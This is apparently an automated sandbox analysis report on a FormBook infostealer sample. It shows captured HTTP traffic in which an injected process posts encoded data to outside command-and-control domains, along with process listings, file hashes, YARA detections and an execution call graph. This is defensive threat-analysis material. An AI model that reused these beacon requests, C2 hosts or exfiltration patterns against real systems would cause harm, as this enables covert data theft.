                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=1d/jhpB+efMpIfJDL4Ec+KzTtvizos0RGaFjJBc8j3ZOpbbCDIptVj+I2US8Nt/DrWGh8xDU9ciZLAo9+bBUJn3BJ7wt4OV7m3DOQR5l0QrctyCK8nBQXExiRQ5IrUchWBL3qfESzEXpOi5KN9PfVpbGs82zqZJEfLc1xERVQlnwDW3smHi6ncBPCx8yewiy5R255+WLL1Ngz5cdQsrmqm5kg5sy
                                                                                      Jan 10, 2025 19:54:40.584024906 CET | 877 | IN | HTTP/1.1 200 OK
                                                                                      Server: openresty/1.13.6.1
                                                                                      Date: Fri, 10 Jan 2025 18:54:40 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      44 | 192.168.2.5 | 50042 | 194.195.220.41 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:42.606493950 CET | 1829 | OUT | POST /t846/ HTTP/1.1
                                                                                      Host: www.earbudsstore.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.earbudsstore.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.earbudsstore.shop/t846/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:43.102020025 CET | 877 | IN | HTTP/1.1 200 OK
                                                                                      Server: openresty/1.13.6.1
                                                                                      Date: Fri, 10 Jan 2025 18:54:43 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      45 | 192.168.2.5 | 50043 | 194.195.220.41 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:45.155693054 CET | 528 | OUT | GET /t846/?bbg=4fXDidx2O/QZfth3GLJUvrPztavIjtsHM9AccgwO7Wsf+4yyKbVsNUq9n3baOtbXgE7PgS+t0KauVD8p9LNNPlTmJLw1k/V9vRHWZxkQ6THznCqf0VxFVE5mRi5gyV9wCg==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.earbudsstore.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:45.742014885 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                      Server: openresty/1.13.6.1
                                                                                      Date: Fri, 10 Jan 2025 18:54:45 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Ascii: 522<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.earbudsstore.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.earbudsstore.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.earbudsstore.shop/t846?gp=1&js=1&uuid=1736535285.9772559917&other_args=eyJ1cmkiOiAiL3Q4NDYiLCAiYXJncyI6ICJiYmc9NGZYRGlkeDJPL1FaZnRoM0dMSlV2clB6dGF2SWp0c0hNOUFjY2d3TzdXc2YrNHl5S2JWc05VcTluM2JhT3RiWGdFN1BnUyt0MEthdVZEOHA5TE5OUGxUbUpMdzFrL1Y5dlJIV1p4a1E2VEh6bkNxZjBWeEZWRTVtUmk1Z3lWOXdDZz09JjRIcGg9dFhDWGtwS1BUIiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      46 | 192.168.2.5 | 50046 | 63.250.43.134 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:50.806430101 CET | 807 | OUT | POST /jcfc/ HTTP/1.1
                                                                                      Host: www.oneeyetrousersnake.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.oneeyetrousersnake.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.oneeyetrousersnake.xyz/jcfc/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=5wsD2BEwnnEktc0KbVDdb/B6CJ9V4jG5YZTYzDlgbdU4aNbq6nDFmygvuvcz+IlzTtfe9glvA4ROsyLBaF6/urBNtboE2MwdPCAoO7RyEmx7krJ1oIo+ZzJOqfc+1bhCqRqPFkbPDCwrUDcpbFPm1kJuljv9QgChYc6J1+acADRN/ssbHziX1+pRCom6z9JdeBtE6CQ=
                                                                                      Jan 10, 2025 19:54:51.454307079 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:54:51 GMT
                                                                                      transfer-encoding: chunked
                                                                                      connection: close
                                                                                      Data Ascii: 17A2<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64, [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      47 | 192.168.2.5 | 50047 | 63.250.43.134 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:53.359026909 CET | 827 | OUT | POST /jcfc/ HTTP/1.1
                                                                                      Host: www.oneeyetrousersnake.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.oneeyetrousersnake.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.oneeyetrousersnake.xyz/jcfc/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=5wsD2BEwnnEkt9EKd27dMPB9HJ9VzDGDYZfYzChKcrE4asLq7lnFzygvkPc2hYlsTsjs9gpvA4FOs3vBaU68v7B1g7o8pcwdPCAoO7VLEm57nb51upo9UTJRtfc+/LhOqRrgFneqDBYrUCspcUPp/kJS4zu2VAXzYMzBvYbNfwJoz6dxdRq/meFpS7uNiNo0Ei90kVEQN/PnZJuxuKQKJdhGTAlu
                                                                                      Jan 10, 2025 19:54:53.942375898 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:54:53 GMT
                                                                                      transfer-encoding: chunked
                                                                                      connection: close
                                                                                      Data Ascii: 2E42<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64, [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      48 | 192.168.2.5 | 50048 | 63.250.43.134 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:55.907044888 CET | 1844 | OUT | POST /jcfc/ HTTP/1.1
                                                                                      Host: www.oneeyetrousersnake.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.oneeyetrousersnake.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.oneeyetrousersnake.xyz/jcfc/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg= [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:56.687200069 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:54:56 GMT
                                                                                      transfer-encoding: chunked
                                                                                      connection: close
                                                                                      Data Ascii: 200<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64, [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      49 | 192.168.2.5 | 50049 | 63.250.43.134 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:58.451338053 CET | 533 | OUT | GET /jcfc/?bbg=0yEj10EZmitUhtYjdkKec5xdEI8NxyKfcM7U8ztUVuouZsC423bB43cLiOUB/IRFTMn/ihN/EtpU6HblaUashI5siqQp3v4hHHpGQ8dsEXU8uptspqs9cFl8luc9oYZGow==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.oneeyetrousersnake.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:59.022778988 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:54:58 GMT
                                                                                      transfer-encoding: chunked
                                                                                      connection: close
                                                                                      Data Ascii: 200<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64, [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      50 | 192.168.2.5 | 50050 | 13.248.169.48 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:55:04.473563910 CET | 765 | OUT | POST /h8xm/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.tals.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.tals.xyz/h8xm/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=OhbfEsQbPsT29bLmIxqymsIIKY5ldI+BNETsX9gydneStjpJYf7WUmJGRmkwwSEfCWqDFsbmuD/Ils5w6lXMr9eS8ZDuevsFCexvp+8hvZNvokJDcvf7+/xTbPmSeufNljXFm1mbPFgrw4ulWLOxN4Sdc7M+BhklzG0V32TObMy6QxTN4j75//96jzg9M1MtumVqvg8=
                                                                                      Jan 10, 2025 19:55:04.939409018 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      51 | 192.168.2.5 | 50051 | 13.248.169.48 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:55:07.025955915 CET | 785 | OUT | POST /h8xm/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.tals.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.tals.xyz/h8xm/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=OhbfEsQbPsT2+77mKWeygMILF45lXo+FNEXsX8l5dV6Sjj5JW+7WBmJGZGkx/yFTCWW9FtnmuDrIluxw7W/PtteQ05DsQPsFCexvp+oLvZlv0EZDN+f49/xQNfmSTOf3ljWqm06lPHorw9KlWf62UoSbY7N6OkRt8UkkqnTJLKm9cniniBzRsfRCzgoKdFtE0FFax3qpoedSTkgUyLMw+qL6Mefk
                                                                                      Jan 10, 2025 19:55:07.682120085 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      52 | 192.168.2.5 | 50052 | 13.248.169.48 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:55:09.580379963 CET | 1802 | OUT | POST /h8xm/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.tals.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.tals.xyz/h8xm/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:55:10.037511110 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      53 | 192.168.2.5 | 50053 | 13.248.169.48 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:55:12.276408911 CET | 519 | OUT | GET /h8xm/?bbg=Djz/HatsL8//q4jEHVXjpeAGEqEdbJOsV0SUedpbc1iwsSAKW9bJKhlacHYz2CYne1ysE/rGqXnA3+5LllbTg/a50arMCuQoFYEtuqwmipYtkk9+U+/725Z0eP7TAeqp5A==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:55:12.760904074 CET | 387 | IN | HTTP/1.1 200 OK
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:55:12 GMT
                                                                                      content-length: 266
                                                                                      connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bbg=Djz/HatsL8//q4jEHVXjpeAGEqEdbJOsV0SUedpbc1iwsSAKW9bJKhlacHYz2CYne1ysE/rGqXnA3+5LllbTg/a50arMCuQoFYEtuqwmipYtkk9+U+/725Z0eP7TAeqp5A==&4Hph=tXCXkpKPT"}</script></head></html>


                                                                                      Target ID:0
                                                                                      Start time:13:51:05
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\OVZizpEU7Q.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'786'368 bytes
                                                                                      MD5 hash:B5C6AC313FA5167296FBE879F26C4E0F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:13:51:06
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\OVZizpEU7Q.exe"
                                                                                      Imagebase:0xf30000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2685415495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2686604210.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:13:51:06
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'658'880 bytes
                                                                                      MD5 hash:43F9E491CFEB42E75ED6C50912305629
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:6
                                                                                      Start time:13:51:37
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe"
                                                                                      Imagebase:0x810000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4758462130.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:7
                                                                                      Start time:13:51:41
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\choice.exe"
                                                                                      Imagebase:0x1e0000
                                                                                      File size:28'160 bytes
                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:8
                                                                                      Start time:13:52:04
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff79f9e0000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.6%
                                                                                        Dynamic/Decrypted Code Coverage:7.9%
                                                                                        Signature Coverage:7.1%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:78
108959 4089b3 69 API calls Mailbox 108775->108959 108960 409d3c 60 API calls Mailbox 108775->108960 108776 4100eb 108776->108704 108918 4082df 59 API calls Mailbox 108776->108918 108778->108747 108780->108689 108781->108685 108782->108689 108783->108689 108784->108700 108788 420dbe 108785->108788 108787 420dd8 108787->108700 108788->108787 108790 420ddc std::exception::exception 108788->108790 108796 42571c 108788->108796 108813 4233a1 DecodePointer 108788->108813 108814 42859b RaiseException 108790->108814 108792 420e06 108815 4284d1 58 API calls _free 108792->108815 108794 420e18 108794->108700 108795->108700 108797 425797 108796->108797 108806 425728 108796->108806 108822 4233a1 DecodePointer 108797->108822 108799 42579d 108823 428b28 58 API calls __getptd_noexit 108799->108823 108802 42575b RtlAllocateHeap 108803 42578f 108802->108803 108802->108806 108803->108788 108805 425783 108820 428b28 58 API calls __getptd_noexit 108805->108820 108806->108802 108806->108805 108807 425733 108806->108807 108811 425781 108806->108811 108819 4233a1 DecodePointer 108806->108819 108807->108806 108816 42a16b 58 API calls __NMSG_WRITE 108807->108816 108817 42a1c8 58 API calls 6 library calls 108807->108817 108818 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108807->108818 108821 428b28 58 API calls __getptd_noexit 108811->108821 108813->108788 108814->108792 108815->108794 108816->108807 108817->108807 108819->108806 108820->108811 108821->108803 108822->108799 108823->108803 108825 40818f 108824->108825 108828 4081aa 108824->108828 108973 407e4f 108825->108973 108827 408197 CharUpperBuffW 108827->108828 108828->108703 108830 40f251 108829->108830 108831 40f272 108830->108831 108977 469e4a 89 API calls 4 library calls 108830->108977 108831->108744 108834 40838d 108833->108834 108835 43edbd 108833->108835 108836 420db6 Mailbox 59 API calls 108834->108836 108837 408394 108836->108837 108838 4083b5 108837->108838 108978 408634 59 API calls Mailbox 
108837->108978 108838->108721 108838->108726 108841 444cc3 108840->108841 108854 4109f5 108840->108854 109041 469e4a 89 API calls 4 library calls 108841->109041 108843 410cfa 108843->108752 108846 410ee4 108846->108843 108848 410ef1 108846->108848 108847 410a4b PeekMessageW 108902 410a05 Mailbox 108847->108902 109039 411093 341 API calls Mailbox 108848->109039 108851 410ef8 LockWindowUpdate DestroyWindow GetMessageW 108851->108843 108852 410f2a 108851->108852 108856 445c58 TranslateMessage DispatchMessageW GetMessageW 108852->108856 108853 410ce4 108853->108843 109038 411070 10 API calls Mailbox 108853->109038 108854->108902 109042 409e5d 60 API calls 108854->109042 109043 456349 341 API calls 108854->109043 108855 444e81 Sleep 108855->108902 108856->108856 108858 445c88 108856->108858 108858->108843 108859 444d50 TranslateAcceleratorW 108860 410e43 PeekMessageW 108859->108860 108859->108902 108860->108902 108861 410ea5 TranslateMessage DispatchMessageW 108861->108860 108862 44581f WaitForSingleObject 108865 44583c GetExitCodeProcess CloseHandle 108862->108865 108862->108902 108864 410d13 timeGetTime 108864->108902 108900 410f95 108865->108900 108866 410e5f Sleep 108901 410e70 Mailbox 108866->108901 108867 408047 59 API calls 108867->108902 108869 445af8 Sleep 108869->108901 108871 420db6 59 API calls Mailbox 108871->108902 108873 410f4e timeGetTime 109040 409e5d 60 API calls 108873->109040 108874 42049f timeGetTime 108874->108901 108877 445b8f GetExitCodeProcess 108880 445ba5 WaitForSingleObject 108877->108880 108881 445bbb CloseHandle 108877->108881 108879 40b7dd 109 API calls 108879->108901 108880->108881 108880->108902 108881->108901 108884 485f25 110 API calls 108884->108901 108885 445874 108885->108900 108886 409e5d 60 API calls 108886->108902 108887 445078 Sleep 108887->108902 108888 445c17 Sleep 108888->108902 108894 409ea0 314 API calls 108894->108902 108897 40fce0 314 API calls 